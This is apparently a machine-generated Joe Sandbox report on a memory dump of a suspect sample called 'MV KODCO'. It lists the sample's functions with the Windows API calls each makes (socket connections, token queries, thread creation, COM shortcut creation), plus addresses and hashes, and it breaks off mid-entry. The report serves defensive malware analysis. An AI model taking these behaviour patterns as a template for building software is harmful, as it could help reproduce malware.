                                                          • API String ID: 3902887630-0
                                                          • Opcode ID: 0040eb90ddedf6ea298e56bc6c205ffdbd81f49bd9e11d1d2e734fac74517d07
                                                          • Instruction ID: eb8b9996e0674481308a44721119ab3e83c520a0cc5b4553b2f79e56eeee522d
                                                          • Opcode Fuzzy Hash: 0040eb90ddedf6ea298e56bc6c205ffdbd81f49bd9e11d1d2e734fac74517d07
                                                          • Instruction Fuzzy Hash: 13210771604104BBEB155B39DC49EBB7BAEEF45750F184029F909CA191EAA5DC81D3A0
                                                          APIs
                                                            • Part of subcall function 005FB34E: GetWindowLongW.USER32(?,000000EB), ref: 005FB35F
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0064DEB0
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0064DED4
                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0064DEEC
                                                          • GetSystemMetrics.USER32(00000004), ref: 0064DF14
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00633A1E,00000000), ref: 0064DF32
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$MetricsSystem
                                                          • String ID:
                                                          • API String ID: 2294984445-0
                                                          • Opcode ID: 5eab7868dc61ec68a5ec13d885fceb5147be57d7762cd56f3f7f11dd714b5fc4
                                                          • Instruction ID: 2b6505078c1343bc9fe6e7e1918fba495946ca0a00b1e68d9ea839826ffe76e7
                                                          • Opcode Fuzzy Hash: 5eab7868dc61ec68a5ec13d885fceb5147be57d7762cd56f3f7f11dd714b5fc4
                                                          • Instruction Fuzzy Hash: EE21A171E11216AFCB205F78DC48BAA3B97FB56324F151724F926CA6E0D7709C51CB80
                                                          APIs
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0061BC90
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0061BCC2
                                                          • __itow.LIBCMT ref: 0061BCDA
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0061BD00
                                                          • __itow.LIBCMT ref: 0061BD11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow
                                                          • String ID:
                                                          • API String ID: 3379773720-0
                                                          • Opcode ID: 2a880582062bdec0c164ccf788e054a22b96f0bde619c0ce348d80e3fecc4b32
                                                          • Instruction ID: 4e4437dd080598587bb1109be1c1d0385b0418ba22eb86214ce5f63519ac132b
                                                          • Opcode Fuzzy Hash: 2a880582062bdec0c164ccf788e054a22b96f0bde619c0ce348d80e3fecc4b32
                                                          • Instruction Fuzzy Hash: 74210B71B00208BBDB15AF659C46FDF7A6AAF9D350F042024F945EB181DB70898583E1
                                                          APIs
                                                            • Part of subcall function 005E50E6: _wcsncpy.LIBCMT ref: 005E50FA
                                                          • GetFileAttributesW.KERNEL32(?,?,?,?,006260C3), ref: 00626369
                                                          • GetLastError.KERNEL32(?,?,?,006260C3), ref: 00626374
                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006260C3), ref: 00626388
                                                          • _wcsrchr.LIBCMT ref: 006263AA
                                                            • Part of subcall function 00626318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006260C3), ref: 006263E0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                          • String ID:
                                                          • API String ID: 3633006590-0
                                                          • Opcode ID: 52f082ad395cfadd4f5a3d34de98f8087d4fb4ee4f5872446d47d26da1506b7f
                                                          • Instruction ID: 2a0586ed578c83328335f6672459df8a89bcd34aed9336756179a15de9383f97
                                                          • Opcode Fuzzy Hash: 52f082ad395cfadd4f5a3d34de98f8087d4fb4ee4f5872446d47d26da1506b7f
                                                          • Instruction Fuzzy Hash: AD210B31904A2546DB25E774FC56FEA33AEBF05390F106069F545D31C0EFA0D9818F54
                                                          APIs
                                                            • Part of subcall function 0063A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0063A84E
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00638BD3
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00638BE2
                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00638BFE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastconnectinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 3701255441-0
                                                          • Opcode ID: 712311197da435f9e4df37c6ea3cf155c20da13d190bb94860bc6a4cc4b86902
                                                          • Instruction ID: ac09e25e025f8d07941d43438d297018d7d47d141600949b31770eafb5ac35bf
                                                          • Opcode Fuzzy Hash: 712311197da435f9e4df37c6ea3cf155c20da13d190bb94860bc6a4cc4b86902
                                                          • Instruction Fuzzy Hash: FD21C3317002159FCB10AF68CD49BBD7BAAAF88720F045449F946973D2CBB4AC018BA1
                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 00638441
                                                          • GetForegroundWindow.USER32 ref: 00638458
                                                          • GetDC.USER32(00000000), ref: 00638494
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 006384A0
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 006384DB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          • Opcode ID: a0e6d31006b236e52f8e82106cd0e9bcedd6a6933be19756e6f0d3a709ac3a1b
                                                          • Instruction ID: 8df21aa09e36ac8b94d1eaf0a6dae7db11716d84f11f0896b2ce9be9ae8a99de
                                                          • Opcode Fuzzy Hash: a0e6d31006b236e52f8e82106cd0e9bcedd6a6933be19756e6f0d3a709ac3a1b
                                                          • Instruction Fuzzy Hash: 38216275A00205AFD704DFA5DD49AAEBBF6EF48301F048479F95997251DAB0AC00CBA0
                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 005FAFE3
                                                          • SelectObject.GDI32(?,00000000), ref: 005FAFF2
                                                          • BeginPath.GDI32(?), ref: 005FB009
                                                          • SelectObject.GDI32(?,00000000), ref: 005FB033
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: 9046221d703a91f31e7544f55cfdbf07c042fd564540b121ced6d63daa26081e
                                                          • Instruction ID: b4399c5620f974709a9b5600ecb116a590998a48e90c6df1b786c9224f7cf2f7
                                                          • Opcode Fuzzy Hash: 9046221d703a91f31e7544f55cfdbf07c042fd564540b121ced6d63daa26081e
                                                          • Instruction Fuzzy Hash: 3921C1B4900209EFDB10EF55EC487AA7B6ABB13391F18631AF524DA1E0C7B46951CF91
                                                          APIs
                                                          • __calloc_crt.LIBCMT ref: 006021A9
                                                          • CreateThread.KERNEL32(?,?,006022DF,00000000,?,?), ref: 006021ED
                                                          • GetLastError.KERNEL32 ref: 006021F7
                                                          • _free.LIBCMT ref: 00602200
                                                          • __dosmaperr.LIBCMT ref: 0060220B
                                                            • Part of subcall function 00607C0E: __getptd_noexit.LIBCMT ref: 00607C0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                          • String ID:
                                                          • API String ID: 2664167353-0
                                                          • Opcode ID: fb237aa42030c38fe2a87976f0e3529755dbd43bbad6fd5436bab976a503688d
                                                          • Instruction ID: e316791fdd3ce294161e90ff34ef96ffdd9056553a127cb9dd8b5a19d1795c1d
                                                          • Opcode Fuzzy Hash: fb237aa42030c38fe2a87976f0e3529755dbd43bbad6fd5436bab976a503688d
                                                          • Instruction Fuzzy Hash: CA1148322843076FEB18AFA4DC45C9B379BEF01730B10002DFA14862C1EB71D85186A4
                                                          APIs
                                                          • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0061ABD7
                                                          • GetLastError.KERNEL32(?,0061A69F,?,?,?), ref: 0061ABE1
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,0061A69F,?,?,?), ref: 0061ABF0
                                                          • HeapAlloc.KERNEL32(00000000,?,0061A69F,?,?,?), ref: 0061ABF7
                                                          • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0061AC0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 842720411-0
                                                          • Opcode ID: 83855ad638d90d0c673846f3dd62cc60b58c7b996ad20546e3cfd2f400facd1b
                                                          • Instruction ID: cb95b742f2792f9c666cc754ff2c9e3ab1e5cc4c925012c7ef12ebabb1a8cc93
                                                          • Opcode Fuzzy Hash: 83855ad638d90d0c673846f3dd62cc60b58c7b996ad20546e3cfd2f400facd1b
                                                          • Instruction Fuzzy Hash: E6016970701205BFDB104FAADC48DAB3BBEEF8A354B140429F806C3260DAB18C80CBA0
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00627A74
                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00627A82
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00627A8A
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00627A94
                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00627AD0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          • Opcode ID: 41ec11f6129955680c6fad28c5bd39bcfb4b02e1c1f3253e9af7fa69a4bbcbed
                                                          • Instruction ID: 01722b69f40b277f0b1c5c929a805696227a25a8b49208f2bc71f7c64a63f2f8
                                                          • Opcode Fuzzy Hash: 41ec11f6129955680c6fad28c5bd39bcfb4b02e1c1f3253e9af7fa69a4bbcbed
                                                          • Instruction Fuzzy Hash: 9C018C31D04A29EBCF00AFE5EC49ADDFB7AFF09321F000085E902B2250DB709654CBA5
                                                          APIs
                                                          • CLSIDFromProgID.OLE32 ref: 00619ADC
                                                          • ProgIDFromCLSID.OLE32(?,00000000), ref: 00619AF7
                                                          • lstrcmpiW.KERNEL32(?,00000000), ref: 00619B05
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00619B15
                                                          • CLSIDFromString.OLE32(?,?), ref: 00619B21
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                          • String ID:
                                                          • API String ID: 3897988419-0
                                                          • Opcode ID: 43acd44bead64c8f1deac659ade46431ff8b84124bdd1b54f057399b398bf175
                                                          • Instruction ID: 90aaef26ebd0333e1189662fa3f22b7da18b5ceca2957ef1ad441fb5cb804e03
                                                          • Opcode Fuzzy Hash: 43acd44bead64c8f1deac659ade46431ff8b84124bdd1b54f057399b398bf175
                                                          • Instruction Fuzzy Hash: DA012C76B00215ABDB115F64ED58ADA7AFEEB49791F184028F905D2210D7B0DD849BB0
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0061AA79
                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0061AA83
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0061AA92
                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0061AA99
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0061AAAF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 49790b3ab4df084c6228f10f05ff0b0d386a8cc98696776f5ff0d6c8aa581f3b
                                                          • Instruction ID: 88b08f10e0465f899cfdf7e6cf0b06dc92a09e66d42af8333010076e23893b52
                                                          • Opcode Fuzzy Hash: 49790b3ab4df084c6228f10f05ff0b0d386a8cc98696776f5ff0d6c8aa581f3b
                                                          • Instruction Fuzzy Hash: CEF0AF313012087FEB101FA5AC88EFB3BAEFF4A754F044119F901C7290DAA19C41CA61
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0061AADA
                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0061AAE4
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0061AAF3
                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0061AAFA
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0061AB10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 5636c25a6e8a94bd3a5be51108671831ad15ed2ed0ceabb37ed7cea4af77c927
                                                          • Instruction ID: a28e6c8e57b301fbb886f1eccb9fd5c98ff46533247010ce98fffe076ee243d6
                                                          • Opcode Fuzzy Hash: 5636c25a6e8a94bd3a5be51108671831ad15ed2ed0ceabb37ed7cea4af77c927
                                                          • Instruction Fuzzy Hash: E8F04F717052487FEB111FA5EC88EFB3BBEFF4A754F040029F941C7290CAA198458A61
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0061EC94
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0061ECAB
                                                          • MessageBeep.USER32(00000000), ref: 0061ECC3
                                                          • KillTimer.USER32(?,0000040A), ref: 0061ECDF
                                                          • EndDialog.USER32(?,00000001), ref: 0061ECF9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          • Opcode ID: e6f6bec0ac57f9fe27a9b6fdd8ce904d4f0e6695d2ec3a908e37a6a3308c903d
                                                          • Instruction ID: 8e8d8838c76c84c524612383fd54f18e877367f73fa74adf82912974e48981ad
                                                          • Opcode Fuzzy Hash: e6f6bec0ac57f9fe27a9b6fdd8ce904d4f0e6695d2ec3a908e37a6a3308c903d
                                                          • Instruction Fuzzy Hash: 16018130A00705ABEB245B11DE4EBD67BBAFB10705F041559F993A14E0DBF5AA84CBC0
                                                          APIs
                                                          • EndPath.GDI32(?), ref: 005FB0BA
                                                          • StrokeAndFillPath.GDI32(?,?,0065E680,00000000,?,?,?), ref: 005FB0D6
                                                          • SelectObject.GDI32(?,00000000), ref: 005FB0E9
                                                          • DeleteObject.GDI32 ref: 005FB0FC
                                                          • StrokePath.GDI32(?), ref: 005FB117
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          • Opcode ID: 9eab952442d437e06fa1aac770f9f09aa374f7cdfbf6729d6018eda31ed58b28
                                                          • Instruction ID: c5c856c6d5994f1665cfa88a9d86142e56baa717ab4d911691271307998e08fb
                                                          • Opcode Fuzzy Hash: 9eab952442d437e06fa1aac770f9f09aa374f7cdfbf6729d6018eda31ed58b28
                                                          • Instruction Fuzzy Hash: 17F01934100608EFDB21AF65EC0C7643F6AB7133A2F18A314E525880F0CB749A66CF50
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 0062F2DA
                                                          • CoCreateInstance.OLE32(0066DA7C,00000000,00000001,0066D8EC,?), ref: 0062F2F2
                                                          • CoUninitialize.OLE32 ref: 0062F555
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize
                                                          • String ID: .lnk
                                                          • API String ID: 948891078-24824748
                                                          • Opcode ID: 41d7c1eb607c0d674753d3379cf113d47668aef7f52af078eceef069296cb1fd
                                                          • Instruction ID: 3341105fa644113054ce68cab7a2a09173a0e15cf47c0e931ba5f9f01d5363f5
                                                          • Opcode Fuzzy Hash: 41d7c1eb607c0d674753d3379cf113d47668aef7f52af078eceef069296cb1fd
                                                          • Instruction Fuzzy Hash: 5DA13AB1104246AFD304EF64C885DABBBADFFD8314F40491DF29597192EB70EA49CB52
                                                          APIs
                                                            • Part of subcall function 005E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005E53B1,?,?,005E61FF,?,00000000,00000001,00000000), ref: 005E662F
                                                          • CoInitialize.OLE32(00000000), ref: 0062E85D
                                                          • CoCreateInstance.OLE32(0066DA7C,00000000,00000001,0066D8EC,?), ref: 0062E876
                                                          • CoUninitialize.OLE32 ref: 0062E893
                                                            • Part of subcall function 005E936C: __swprintf.LIBCMT ref: 005E93AB
                                                            • Part of subcall function 005E936C: __itow.LIBCMT ref: 005E93DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
